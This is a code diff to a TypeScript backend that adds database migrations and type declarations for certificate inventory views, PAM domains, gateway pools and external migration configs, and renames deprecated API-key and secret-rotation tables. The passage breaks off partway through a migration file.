TAuthMode } from "@app/server/plugins/auth/inject-identity"; import { TAccountRecoveryServiceFactory } from "@app/services/account-recovery/account-recovery-service"; import { TAdditionalPrivilegeServiceFactory } from "@app/services/additional-privilege/additional-privilege-service"; -import { TApiKeyServiceFactory } from "@app/services/api-key/api-key-service"; import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; import { TAppConnectionCredentialRotationServiceFactory } from "@app/services/app-connection/credential-rotation"; import { TApprovalPolicyServiceFactory } from 
"@app/services/approval-policy/approval-policy-service"; import { TAuthLoginFactory } from "@app/services/auth/auth-login-service"; import { TAuthPasswordFactory } from "@app/services/auth/auth-password-service"; import { TAuthSignupFactory } from "@app/services/auth/auth-signup-service"; -import { ActorAuthMethod, ActorType, TProviderAuthCallback } from "@app/services/auth/auth-type"; +import { ActorAuthMethod, ActorType, MfaMethod, TProviderAuthCallback } from "@app/services/auth/auth-type"; import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service"; import { TCertificateServiceFactory } from "@app/services/certificate/certificate-service"; import { TCaAutoRenewalQueueFactory } from "@app/services/certificate-authority/ca-auto-renewal-queue"; @@ -83,6 +84,7 @@ import { TCertificateAuthorityServiceFactory } from "@app/services/certificate-a import { TInternalCertificateAuthorityServiceFactory } from "@app/services/certificate-authority/internal/internal-certificate-authority-service"; import { TCertificateCleanupServiceFactory } from "@app/services/certificate-cleanup/certificate-cleanup-service"; import { TCertificateEstV3ServiceFactory } from "@app/services/certificate-est-v3/certificate-est-v3-service"; +import { TCertificateInventoryViewServiceFactory } from "@app/services/certificate-inventory-view/certificate-inventory-view-service"; import { TCertificatePolicyServiceFactory } from "@app/services/certificate-policy/certificate-policy-service"; import { TCertificateProfileServiceFactory } from "@app/services/certificate-profile/certificate-profile-service"; import { TCertificateRequestServiceFactory } from "@app/services/certificate-request/certificate-request-service"; @@ -152,7 +154,6 @@ import { TSlackServiceFactory } from "@app/services/slack/slack-service"; import { TSuperAdminServiceFactory } from "@app/services/super-admin/super-admin-service"; import { TTelemetryServiceFactory } from 
"@app/services/telemetry/telemetry-service"; import { TTotpServiceFactory } from "@app/services/totp/totp-service"; -import { TUpgradePathService } from "@app/services/upgrade-path/upgrade-path-service"; import { TUserDALFactory } from "@app/services/user/user-dal"; import { TUserServiceFactory } from "@app/services/user/user-service"; import { TUserEngagementServiceFactory } from "@app/services/user-engagement/user-engagement-service"; @@ -217,6 +218,7 @@ declare module "fastify" { userId: string; orgId?: string; user: TUsers; + requiredMfaMethod: MfaMethod; }; // identity injection. depending on which kinda of token the information is filled in auth auth: TAuthMode; @@ -265,7 +267,6 @@ declare module "fastify" { user: TUserServiceFactory; group: TGroupServiceFactory; groupProject: TGroupProjectServiceFactory; - apiKey: TApiKeyServiceFactory; pkiAlert: TPkiAlertServiceFactory; project: TProjectServiceFactory; projectMembership: TProjectMembershipServiceFactory; @@ -303,7 +304,6 @@ declare module "fastify" { accessApprovalRequest: TAccessApprovalRequestServiceFactory; secretApprovalPolicy: TSecretApprovalPolicyServiceFactory; secretApprovalRequest: TSecretApprovalRequestServiceFactory; - secretRotation: TSecretRotationServiceFactory; snapshot: TSecretSnapshotServiceFactory; saml: TSamlConfigServiceFactory; scim: TScimServiceFactory; @@ -312,6 +312,7 @@ declare module "fastify" { auditLogStream: TAuditLogStreamServiceFactory; certificate: TCertificateServiceFactory; certificateCleanup: TCertificateCleanupServiceFactory; + certificateInventoryView: TCertificateInventoryViewServiceFactory; certificateV3: TCertificateV3ServiceFactory; certificateRequest: TCertificateRequestServiceFactory; certificateTemplate: TCertificateTemplateServiceFactory; @@ -363,8 +364,10 @@ declare module "fastify" { secretRotationV2: TSecretRotationV2ServiceFactory; microsoftTeams: TMicrosoftTeamsServiceFactory; assumePrivileges: TAssumePrivilegeServiceFactory; + insights: 
TInsightsServiceFactory; relay: TRelayServiceFactory; gatewayV2: TGatewayV2ServiceFactory; + gatewayPool: TGatewayPoolServiceFactory; githubOrgSync: TGithubOrgSyncServiceFactory; folderCommit: TFolderCommitServiceFactory; pit: TPitServiceFactory; @@ -380,6 +383,7 @@ declare module "fastify" { offlineUsageReport: TOfflineUsageReportServiceFactory; pamFolder: TPamFolderServiceFactory; pamResource: TPamResourceServiceFactory; + pamDomain: TPamDomainServiceFactory; pamResourceRotationRules: TPamResourceRotationRulesServiceFactory; pamAccount: TPamAccountServiceFactory; pamAccountPolicy: TPamAccountPolicyServiceFactory; @@ -387,8 +391,6 @@ declare module "fastify" { pamWebAccess: TPamWebAccessServiceFactory; pamDiscoverySource: TPamDiscoverySourceServiceFactory; mfaSession: TMfaSessionServiceFactory; - upgradePath: TUpgradePathService; - membershipUser: TMembershipUserServiceFactory; membershipIdentity: TMembershipIdentityServiceFactory; membershipGroup: TMembershipGroupServiceFactory; diff --git a/backend/src/@types/knex.d.ts b/backend/src/@types/knex.d.ts index 9b474f1b81d..12fe095e2de 100644 --- a/backend/src/@types/knex.d.ts +++ b/backend/src/@types/knex.d.ts @@ -41,9 +41,6 @@ import { TAiMcpServerUserCredentials, TAiMcpServerUserCredentialsInsert, TAiMcpServerUserCredentialsUpdate, - TApiKeys, - TApiKeysInsert, - TApiKeysUpdate, TAppConnectionCredentialRotations, TAppConnectionCredentialRotationsInsert, TAppConnectionCredentialRotationsUpdate, @@ -110,6 +107,9 @@ import { TCertificateCleanupConfigs, TCertificateCleanupConfigsInsert, TCertificateCleanupConfigsUpdate, + TCertificateInventoryViews, + TCertificateInventoryViewsInsert, + TCertificateInventoryViewsUpdate, TCertificates, TCertificateSecrets, TCertificateSecretsInsert, @@ -140,6 +140,9 @@ import { TExternalKms, TExternalKmsInsert, TExternalKmsUpdate, + TExternalMigrationConfigs, + TExternalMigrationConfigsInsert, + TExternalMigrationConfigsUpdate, TFolderCheckpointResources, 
TFolderCheckpointResourcesInsert, TFolderCheckpointResourcesUpdate, @@ -158,6 +161,15 @@ import { TFolderTreeCheckpoints, TFolderTreeCheckpointsInsert, TFolderTreeCheckpointsUpdate, + TGatewayEnrollmentTokens, + TGatewayEnrollmentTokensInsert, + TGatewayEnrollmentTokensUpdate, + TGatewayPoolMemberships, + TGatewayPoolMembershipsInsert, + TGatewayPoolMembershipsUpdate, + TGatewayPools, + TGatewayPoolsInsert, + TGatewayPoolsUpdate, TGateways, TGatewaysInsert, TGatewaysUpdate, @@ -368,6 +380,9 @@ import { TPkiEstEnrollmentConfigs, TPkiEstEnrollmentConfigsInsert, TPkiEstEnrollmentConfigsUpdate, + TPkiScepDynamicChallenges, + TPkiScepDynamicChallengesInsert, + TPkiScepDynamicChallengesUpdate, TPkiScepEnrollmentConfigs, TPkiScepEnrollmentConfigsInsert, TPkiScepEnrollmentConfigsUpdate, @@ -488,15 +503,6 @@ import { TSecretReferencesV2, TSecretReferencesV2Insert, TSecretReferencesV2Update, - TSecretRotationOutputs, - TSecretRotationOutputsInsert, - TSecretRotationOutputsUpdate, - TSecretRotationOutputV2, - TSecretRotationOutputV2Insert, - TSecretRotationOutputV2Update, - TSecretRotations, - TSecretRotationsInsert, - TSecretRotationsUpdate, TSecretRotationsV2, TSecretRotationsV2Insert, TSecretRotationsV2Update, @@ -706,6 +712,7 @@ import { TPamDiscoverySourcesInsert, TPamDiscoverySourcesUpdate } from "@app/db/schemas/pam-discovery-sources"; +import { TPamDomains, TPamDomainsInsert, TPamDomainsUpdate } from "@app/db/schemas/pam-domains"; import { TPamFolders, TPamFoldersInsert, TPamFoldersUpdate } from "@app/db/schemas/pam-folders"; import { TPamResourceFavorites, @@ -881,6 +888,11 @@ declare module "knex/types/tables" { TPkiScepTransactionsInsert, TPkiScepTransactionsUpdate >; + [TableName.PkiScepDynamicChallenge]: KnexOriginal.CompositeTableType< + TPkiScepDynamicChallenges, + TPkiScepDynamicChallengesInsert, + TPkiScepDynamicChallengesUpdate + >; [TableName.PkiApiEnrollmentConfig]: KnexOriginal.CompositeTableType< TPkiApiEnrollmentConfigs, TPkiApiEnrollmentConfigsInsert, 
@@ -1035,7 +1047,6 @@ declare module "knex/types/tables" { >; [TableName.UserAction]: KnexOriginal.CompositeTableType; [TableName.SuperAdmin]: KnexOriginal.CompositeTableType; - [TableName.ApiKey]: KnexOriginal.CompositeTableType; [TableName.Project]: KnexOriginal.CompositeTableType; [TableName.ProjectSshConfig]: KnexOriginal.CompositeTableType< TProjectSshConfigs, @@ -1264,16 +1275,6 @@ declare module "knex/types/tables" { TSecretApprovalPoliciesEnvironmentsInsert, TSecretApprovalPoliciesEnvironmentsUpdate >; - [TableName.SecretRotation]: KnexOriginal.CompositeTableType< - TSecretRotations, - TSecretRotationsInsert, - TSecretRotationsUpdate - >; - [TableName.SecretRotationOutput]: KnexOriginal.CompositeTableType< - TSecretRotationOutputs, - TSecretRotationOutputsInsert, - TSecretRotationOutputsUpdate - >; [TableName.Snapshot]: KnexOriginal.CompositeTableType< TSecretSnapshots, TSecretSnapshotsInsert, @@ -1374,11 +1375,6 @@ declare module "knex/types/tables" { TSecretApprovalRequestSecretTagsV2Insert, TSecretApprovalRequestSecretTagsV2Update >; - [TableName.SecretRotationOutputV2]: KnexOriginal.CompositeTableType< - TSecretRotationOutputV2, - TSecretRotationOutputV2Insert, - TSecretRotationOutputV2Update - >; // KMS service [TableName.KmsServerRootConfig]: KnexOriginal.CompositeTableType< TKmsRootConfig, @@ -1585,6 +1581,17 @@ declare module "knex/types/tables" { TOrgGatewayConfigV2Update >; [TableName.GatewayV2]: KnexOriginal.CompositeTableType; + [TableName.GatewayEnrollmentTokens]: KnexOriginal.CompositeTableType< + TGatewayEnrollmentTokens, + TGatewayEnrollmentTokensInsert, + TGatewayEnrollmentTokensUpdate + >; + [TableName.GatewayPool]: KnexOriginal.CompositeTableType; + [TableName.GatewayPoolMembership]: KnexOriginal.CompositeTableType< + TGatewayPoolMemberships, + TGatewayPoolMembershipsInsert, + TGatewayPoolMembershipsUpdate + >; [TableName.UserNotifications]: KnexOriginal.CompositeTableType< TUserNotifications, TUserNotificationsInsert, @@ -1602,6 +1609,7 
@@ declare module "knex/types/tables" { TPamResourceFavoritesInsert, TPamResourceFavoritesUpdate >; + [TableName.PamDomain]: KnexOriginal.CompositeTableType; [TableName.PamAccount]: KnexOriginal.CompositeTableType; [TableName.PamAccountPolicy]: KnexOriginal.CompositeTableType< TPamAccountPolicies, @@ -1662,10 +1670,10 @@ declare module "knex/types/tables" { TAdditionalPrivilegesInsert, TAdditionalPrivilegesUpdate >; - [TableName.VaultExternalMigrationConfig]: KnexOriginal.CompositeTableType< - TVaultExternalMigrationConfigs, - TVaultExternalMigrationConfigsInsert, - TVaultExternalMigrationConfigsUpdate + [TableName.ExternalMigrationConfig]: KnexOriginal.CompositeTableType< + TExternalMigrationConfigs, + TExternalMigrationConfigsInsert, + TExternalMigrationConfigsUpdate >; [TableName.WebAuthnCredential]: KnexOriginal.CompositeTableType< TWebauthnCredentials, @@ -1769,10 +1777,20 @@ declare module "knex/types/tables" { TCertificateCleanupConfigsInsert, TCertificateCleanupConfigsUpdate >; + [TableName.CertificateInventoryView]: KnexOriginal.CompositeTableType< + TCertificateInventoryViews, + TCertificateInventoryViewsInsert, + TCertificateInventoryViewsUpdate + >; [TableName.SecretValidationRule]: KnexOriginal.CompositeTableType< TSecretValidationRules, TSecretValidationRulesInsert, TSecretValidationRulesUpdate >; + [TableName.VaultExternalMigrationConfig]: KnexOriginal.CompositeTableType< + TVaultExternalMigrationConfigs, + TVaultExternalMigrationConfigsInsert, + TVaultExternalMigrationConfigsUpdate + >; } } diff --git a/backend/src/auto-start-migrations.ts b/backend/src/auto-start-migrations.ts index 19448f4a44e..eb78825c079 100644 --- a/backend/src/auto-start-migrations.ts +++ b/backend/src/auto-start-migrations.ts @@ -297,6 +297,7 @@ const withStartupLock = async (db: Knex, logger: Logger, doMigrations: () => Pro export const runMigrations = async ({ applicationDb, auditLogDb, clickhouseClient, logger }: TArgs) => { const generateSanitizedSchema = 
process.env.GENERATE_SANITIZED_SCHEMA === "true"; + const failOnSanitizedSchemaError = process.env.FAIL_ON_SANITIZED_SCHEMA_ERROR === "true"; try { // akhilmhdh(Feb 10 2025): 2 years from now remove this @@ -369,6 +370,9 @@ export const runMigrations = async ({ applicationDb, auditLogDb, clickhouseClien { err, errorId: SANITIZED_SCHEMA_ERROR, phase: "recreate" }, `${SANITIZED_SCHEMA_ERROR}: Failed to recreate sanitized schema` ); + if (failOnSanitizedSchemaError) { + throw err; + } } } return; @@ -424,6 +428,9 @@ export const runMigrations = async ({ applicationDb, auditLogDb, clickhouseClien { err, errorId: SANITIZED_SCHEMA_ERROR, phase: "create" }, `${SANITIZED_SCHEMA_ERROR}: Failed to create sanitized schema after migrations` ); + if (failOnSanitizedSchemaError) { + throw err; + } } } } catch (err) { diff --git a/backend/src/db/migrations/20231207105059_api-key.ts b/backend/src/db/migrations/20231207105059_api-key.ts index bb65ffadfde..fbb16208c9a 100644 --- a/backend/src/db/migrations/20231207105059_api-key.ts +++ b/backend/src/db/migrations/20231207105059_api-key.ts @@ -4,9 +4,9 @@ import { TableName } from "../schemas"; import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; export async function up(knex: Knex): Promise { - const isTablePresent = await knex.schema.hasTable(TableName.ApiKey); + const isTablePresent = await knex.schema.hasTable(TableName.DeprecatedApiKey); if (!isTablePresent) { - await knex.schema.createTable(TableName.ApiKey, (t) => { + await knex.schema.createTable(TableName.DeprecatedApiKey, (t) => { t.string("id", 36).primary().defaultTo(knex.fn.uuid()); t.string("name").notNullable(); t.datetime("lastUsed"); @@ -17,10 +17,10 @@ export async function up(knex: Knex): Promise { t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE"); }); } - await createOnUpdateTrigger(knex, TableName.ApiKey); + await createOnUpdateTrigger(knex, TableName.DeprecatedApiKey); } export async function down(knex: Knex): 
Promise { - await knex.schema.dropTableIfExists(TableName.ApiKey); - await dropOnUpdateTrigger(knex, TableName.ApiKey); + await knex.schema.dropTableIfExists(TableName.DeprecatedApiKey); + await dropOnUpdateTrigger(knex, TableName.DeprecatedApiKey); } diff --git a/backend/src/db/migrations/20240102152111_secret-rotation.ts b/backend/src/db/migrations/20240102152111_secret-rotation.ts index ea962cc6ec6..1e3508a728f 100644 --- a/backend/src/db/migrations/20240102152111_secret-rotation.ts +++ b/backend/src/db/migrations/20240102152111_secret-rotation.ts @@ -4,8 +4,8 @@ import { TableName } from "../schemas"; import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; export async function up(knex: Knex): Promise { - if (!(await knex.schema.hasTable(TableName.SecretRotation))) { - await knex.schema.createTable(TableName.SecretRotation, (t) => { + if (!(await knex.schema.hasTable(TableName.DeprecatedSecretRotationV1))) { + await knex.schema.createTable(TableName.DeprecatedSecretRotationV1, (t) => { t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); t.string("provider").notNullable(); t.string("secretPath").notNullable(); @@ -23,22 +23,22 @@ export async function up(knex: Knex): Promise { t.timestamps(true, true, true); }); } - await createOnUpdateTrigger(knex, TableName.SecretRotation); + await createOnUpdateTrigger(knex, TableName.DeprecatedSecretRotationV1); - if (!(await knex.schema.hasTable(TableName.SecretRotationOutput))) { - await knex.schema.createTable(TableName.SecretRotationOutput, (t) => { + if (!(await knex.schema.hasTable(TableName.DeprecatedSecretRotationOutput))) { + await knex.schema.createTable(TableName.DeprecatedSecretRotationOutput, (t) => { t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); t.string("key").notNullable(); t.uuid("secretId").notNullable(); t.foreign("secretId").references("id").inTable(TableName.Secret).onDelete("CASCADE"); t.uuid("rotationId").notNullable(); - 
t.foreign("rotationId").references("id").inTable(TableName.SecretRotation).onDelete("CASCADE"); + t.foreign("rotationId").references("id").inTable(TableName.DeprecatedSecretRotationV1).onDelete("CASCADE"); }); } } export async function down(knex: Knex): Promise { - await knex.schema.dropTableIfExists(TableName.SecretRotationOutput); - await knex.schema.dropTableIfExists(TableName.SecretRotation); - await dropOnUpdateTrigger(knex, TableName.SecretRotation); + await dropOnUpdateTrigger(knex, TableName.DeprecatedSecretRotationV1); + await knex.schema.dropTableIfExists(TableName.DeprecatedSecretRotationOutput); + await knex.schema.dropTableIfExists(TableName.DeprecatedSecretRotationV1); } diff --git a/backend/src/db/migrations/20240730181850_secret-v2.ts b/backend/src/db/migrations/20240730181850_secret-v2.ts index d44c67cf1a5..1d461afde3f 100644 --- a/backend/src/db/migrations/20240730181850_secret-v2.ts +++ b/backend/src/db/migrations/20240730181850_secret-v2.ts @@ -134,14 +134,14 @@ export async function up(knex: Knex): Promise { }); } - if (!(await knex.schema.hasTable(TableName.SecretRotationOutputV2))) { - await knex.schema.createTable(TableName.SecretRotationOutputV2, (t) => { + if (!(await knex.schema.hasTable(TableName.DeprecatedSecretRotationOutputV2))) { + await knex.schema.createTable(TableName.DeprecatedSecretRotationOutputV2, (t) => { t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); t.string("key").notNullable(); t.uuid("secretId").notNullable(); t.foreign("secretId").references("id").inTable(TableName.SecretV2).onDelete("CASCADE"); t.uuid("rotationId").notNullable(); - t.foreign("rotationId").references("id").inTable(TableName.SecretRotation).onDelete("CASCADE"); + t.foreign("rotationId").references("id").inTable(TableName.DeprecatedSecretRotationV1).onDelete("CASCADE"); }); } } @@ -154,7 +154,7 @@ export async function down(knex: Knex): Promise { await knex.schema.dropTableIfExists(TableName.SecretV2JnTag); await 
knex.schema.dropTableIfExists(TableName.SecretReferenceV2); - await knex.schema.dropTableIfExists(TableName.SecretRotationOutputV2); + await knex.schema.dropTableIfExists(TableName.DeprecatedSecretRotationOutputV2); await dropOnUpdateTrigger(knex, TableName.SecretVersionV2); await knex.schema.dropTableIfExists(TableName.SecretVersionV2Tag); diff --git a/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts b/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts index aef429ab98d..4ce97480db5 100644 --- a/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts +++ b/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts @@ -2,7 +2,6 @@ import { Knex } from "knex"; import { inMemoryKeyStore } from "@app/keystore/memory"; import { crypto } from "@app/lib/crypto/cryptography"; -import { selectAllTableCols } from "@app/lib/knex"; import { initLogger } from "@app/lib/logger"; import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal"; import { KmsDataKey } from "@app/services/kms/kms-types"; @@ -15,11 +14,14 @@ import { getMigrationEncryptionServices, getMigrationHsmService } from "./utils/ const BATCH_SIZE = 500; export async function up(knex: Knex): Promise { - const hasEncryptedRotationData = await knex.schema.hasColumn(TableName.SecretRotation, "encryptedRotationData"); + const hasEncryptedRotationData = await knex.schema.hasColumn( + TableName.DeprecatedSecretRotationV1, + "encryptedRotationData" + ); - const hasRotationTable = await knex.schema.hasTable(TableName.SecretRotation); + const hasRotationTable = await knex.schema.hasTable(TableName.DeprecatedSecretRotationV1); if (hasRotationTable) { - await knex.schema.alterTable(TableName.SecretRotation, (t) => { + await knex.schema.alterTable(TableName.DeprecatedSecretRotationV1, (t) => { if (!hasEncryptedRotationData) t.binary("encryptedRotationData"); }); } @@ -36,9 +38,9 @@ export async function up(knex: Knex): Promise { const 
projectEncryptionRingBuffer = createCircularCache>>(25); - const secretRotations = await knex(TableName.SecretRotation) - .join(TableName.Environment, `${TableName.Environment}.id`, `${TableName.SecretRotation}.envId`) - .select(selectAllTableCols(TableName.SecretRotation)) + const secretRotations = await knex(TableName.DeprecatedSecretRotationV1) + .join(TableName.Environment, `${TableName.Environment}.id`, `${TableName.DeprecatedSecretRotationV1}.envId`) + .select(`${TableName.DeprecatedSecretRotationV1}.*`) .select(knex.ref("projectId").withSchema(TableName.Environment)) .orderBy(`${TableName.Environment}.projectId` as "projectId"); @@ -88,25 +90,28 @@ export async function up(knex: Knex): Promise { for (let i = 0; i < updatedRotationData.length; i += BATCH_SIZE) { // eslint-disable-next-line no-await-in-loop - await knex(TableName.SecretRotation) + await knex(TableName.DeprecatedSecretRotationV1) .insert(updatedRotationData.slice(i, i + BATCH_SIZE)) .onConflict("id") .merge(); } if (hasRotationTable) { - await knex.schema.alterTable(TableName.SecretRotation, (t) => { + await knex.schema.alterTable(TableName.DeprecatedSecretRotationV1, (t) => { if (!hasEncryptedRotationData) t.binary("encryptedRotationData").notNullable().alter(); }); } } export async function down(knex: Knex): Promise { - const hasEncryptedRotationData = await knex.schema.hasColumn(TableName.SecretRotation, "encryptedRotationData"); + const hasEncryptedRotationData = await knex.schema.hasColumn( + TableName.DeprecatedSecretRotationV1, + "encryptedRotationData" + ); - const hasRotationTable = await knex.schema.hasTable(TableName.SecretRotation); + const hasRotationTable = await knex.schema.hasTable(TableName.DeprecatedSecretRotationV1); if (hasRotationTable) { - await knex.schema.alterTable(TableName.SecretRotation, (t) => { + await knex.schema.alterTable(TableName.DeprecatedSecretRotationV1, (t) => { if (hasEncryptedRotationData) t.dropColumn("encryptedRotationData"); }); } diff --git 
a/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts b/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts index d929b040162..c027069518e 100644 --- a/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts +++ b/backend/src/db/migrations/20260327210655_drop-queue-persistence.ts @@ -7,8 +7,8 @@ const QUEUE_JOBS_TABLE = "queue_jobs"; export async function up(knex: Knex): Promise { const hasTable = await knex.schema.hasTable(QUEUE_JOBS_TABLE); if (hasTable) { - await knex.schema.dropTable(QUEUE_JOBS_TABLE); await dropOnUpdateTrigger(knex, QUEUE_JOBS_TABLE); + await knex.schema.dropTable(QUEUE_JOBS_TABLE); } } diff --git a/backend/src/db/migrations/20260330172252_rename-vault-to-external-migration-config.ts b/backend/src/db/migrations/20260330172252_rename-vault-to-external-migration-config.ts new file mode 100644 index 00000000000..b91e97c9fa8 --- /dev/null +++ b/backend/src/db/migrations/20260330172252_rename-vault-to-external-migration-config.ts @@ -0,0 +1,71 @@ +import { Knex } from "knex"; + +import { inMemoryKeyStore } from "@app/keystore/memory"; +import { selectAllTableCols } from "@app/lib/knex"; +import { initLogger } from "@app/lib/logger"; +import { ExternalMigrationProviders } from "@app/services/external-migration/external-migration-schemas"; +import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal"; +import { KmsDataKey } from "@app/services/kms/kms-types"; +import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; +import { getMigrationEnvConfig, getMigrationHsmConfig } from "./utils/env-config"; +import { getMigrationEncryptionServices, getMigrationHsmService } from "./utils/services"; + +export async function up(knex: Knex): Promise { + initLogger(); + const { hsmService } = await getMigrationHsmService({ envConfig: getMigrationHsmConfig() }); + 
const superAdminDAL = superAdminDALFactory(knex); + const kmsRootConfigDAL = kmsRootConfigDALFactory(knex); + const envConfig = await getMigrationEnvConfig(superAdminDAL, hsmService, kmsRootConfigDAL); + const keyStore = inMemoryKeyStore(); + const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex }); + + if (!(await knex.schema.hasTable(TableName.ExternalMigrationConfig))) { + await knex.schema.createTable(TableName.ExternalMigrationConfig, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + t.uuid("orgId").notNullable(); + t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE"); + t.string("provider").notNullable(); + t.binary("encryptedConfig").notNullable(); + t.uuid("connectionId"); + t.foreign("connectionId").references("id").inTable(TableName.AppConnection); + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.ExternalMigrationConfig); + + if (await knex.schema.hasTable(TableName.VaultExternalMigrationConfig)) { + const existingVaultConfigs = await knex(TableName.VaultExternalMigrationConfig).select( + selectAllTableCols(TableName.VaultExternalMigrationConfig) + ); + + await Promise.all( + existingVaultConfigs.map(async (vaultConfig) => { + const { encryptor } = await kmsService.createCipherPairWithDataKey({ + orgId: vaultConfig.orgId, + type: KmsDataKey.Organization + }); + + const config = { + namespace: vaultConfig.namespace + }; + const { cipherTextBlob: encryptedConfig } = encryptor({ plainText: Buffer.from(JSON.stringify(config)) }); + + await knex(TableName.ExternalMigrationConfig).insert({ + orgId: vaultConfig.orgId, + provider: ExternalMigrationProviders.Vault, + encryptedConfig, + connectionId: vaultConfig.connectionId + }); + }) + ); + } + } +} + +export async function down(knex: Knex): Promise { + await knex.schema.dropTableIfExists(TableName.ExternalMigrationConfig); + await dropOnUpdateTrigger(knex, 
TableName.ExternalMigrationConfig); +} diff --git a/backend/src/db/migrations/20260401124650_certificate-inventory-views.ts b/backend/src/db/migrations/20260401124650_certificate-inventory-views.ts new file mode 100644 index 00000000000..261954af475 --- /dev/null +++ b/backend/src/db/migrations/20260401124650_certificate-inventory-views.ts @@ -0,0 +1,36 @@ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + if (!(await knex.schema.hasTable(TableName.CertificateInventoryView))) { + await knex.schema.createTable(TableName.CertificateInventoryView, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + + t.string("projectId").notNullable(); + t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE"); + + t.string("name", 255).notNullable(); + t.jsonb("filters").notNullable(); + t.jsonb("columns").nullable(); + + t.uuid("createdByUserId").nullable(); + t.foreign("createdByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL"); + + t.timestamps(true, true, true); + + t.index(["projectId", "createdByUserId"]); + t.unique(["projectId", "name", "createdByUserId"]); + }); + + await createOnUpdateTrigger(knex, TableName.CertificateInventoryView); + } +} + +export async function down(knex: Knex): Promise { + if (await knex.schema.hasTable(TableName.CertificateInventoryView)) { + await dropOnUpdateTrigger(knex, TableName.CertificateInventoryView); + await knex.schema.dropTable(TableName.CertificateInventoryView); + } +} diff --git a/backend/src/db/migrations/20260404140728_username-merge.ts b/backend/src/db/migrations/20260404140728_username-merge.ts index 12e693f9b6c..d8d652642bf 100644 --- a/backend/src/db/migrations/20260404140728_username-merge.ts +++ b/backend/src/db/migrations/20260404140728_username-merge.ts @@ -40,6 +40,7 @@ export async function up(knex: 
Knex): Promise { UPDATE "${TableName.Users}" SET "isGitHubVerified" = TRUE WHERE "authMethods" @> ARRAY['github']::text[] + AND "isAccepted" = TRUE AND ("isGitHubVerified" IS NULL OR "isGitHubVerified" = FALSE) `); @@ -47,6 +48,7 @@ export async function up(knex: Knex): Promise { UPDATE "${TableName.Users}" SET "isGoogleVerified" = TRUE WHERE "authMethods" @> ARRAY['google']::text[] + AND "isAccepted" = TRUE AND ("isGoogleVerified" IS NULL OR "isGoogleVerified" = FALSE) `); @@ -54,6 +56,7 @@ export async function up(knex: Knex): Promise { UPDATE "${TableName.Users}" SET "isGitLabVerified" = TRUE WHERE "authMethods" @> ARRAY['gitlab']::text[] + AND "isAccepted" = TRUE AND ("isGitLabVerified" IS NULL OR "isGitLabVerified" = FALSE) `); log(`Step 2 done in ${Date.now() - t}ms`); diff --git a/backend/src/db/migrations/20260408062748_pam-domains.ts b/backend/src/db/migrations/20260408062748_pam-domains.ts new file mode 100644 index 00000000000..3de691870ba --- /dev/null +++ b/backend/src/db/migrations/20260408062748_pam-domains.ts @@ -0,0 +1,219 @@ +/* eslint-disable no-await-in-loop, @typescript-eslint/no-explicit-any */ +import { Knex } from "knex"; + +import { TableName } from "../schemas"; +import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils"; + +export async function up(knex: Knex): Promise { + // \Create pam_domains table + if (!(await knex.schema.hasTable(TableName.PamDomain))) { + await knex.schema.createTable(TableName.PamDomain, (t) => { + t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid()); + + t.string("projectId").notNullable(); + t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE"); + t.index("projectId"); + + t.string("name").notNullable(); + t.index("name"); + + t.string("domainType").notNullable(); + t.index("domainType"); + + t.uuid("gatewayId").nullable(); + t.foreign("gatewayId").references("id").inTable(TableName.GatewayV2); + t.index("gatewayId"); + + 
t.binary("encryptedConnectionDetails").notNullable(); + t.string("discoveryFingerprint").nullable(); + + t.unique(["projectId", "name"]); + + t.timestamps(true, true, true); + }); + + await createOnUpdateTrigger(knex, TableName.PamDomain); + } + + // Add domainId to pam_resources + if (await knex.schema.hasTable(TableName.PamResource)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamResource, "domainId"); + if (!hasDomainId) { + await knex.schema.alterTable(TableName.PamResource, (t) => { + t.uuid("domainId").nullable(); + t.foreign("domainId").references("id").inTable(TableName.PamDomain).onDelete("SET NULL"); + t.index("domainId"); + }); + } + } + + // Add domainId to pam_accounts (exactly one of resourceId/domainId must be set) + if (await knex.schema.hasTable(TableName.PamAccount)) { + const hasDomainId = await knex.schema.hasColumn(TableName.PamAccount, "domainId"); + if (!hasDomainId) { + await knex.schema.alterTable(TableName.PamAccount, (t) => { + t.uuid("domainId").nullable(); + t.foreign("domainId").references("id").inTable(TableName.PamDomain).onDelete("CASCADE"); + t.index("domainId"); + }); + + await knex.schema.alterTable(TableName.PamAccount, (t) => { + t.uuid("resourceId").nullable().alter(); + }); + + await knex.raw(` + ALTER TABLE ${TableName.PamAccount} + ADD CONSTRAINT chk_pam_account_parent + CHECK ( + (("resourceId" IS NOT NULL AND "domainId" IS NULL) OR ("resourceId" IS NULL AND "domainId" IS NOT NULL)) + ) + `); + } + } + + // Add pamDomainId to resource_metadata + if (await 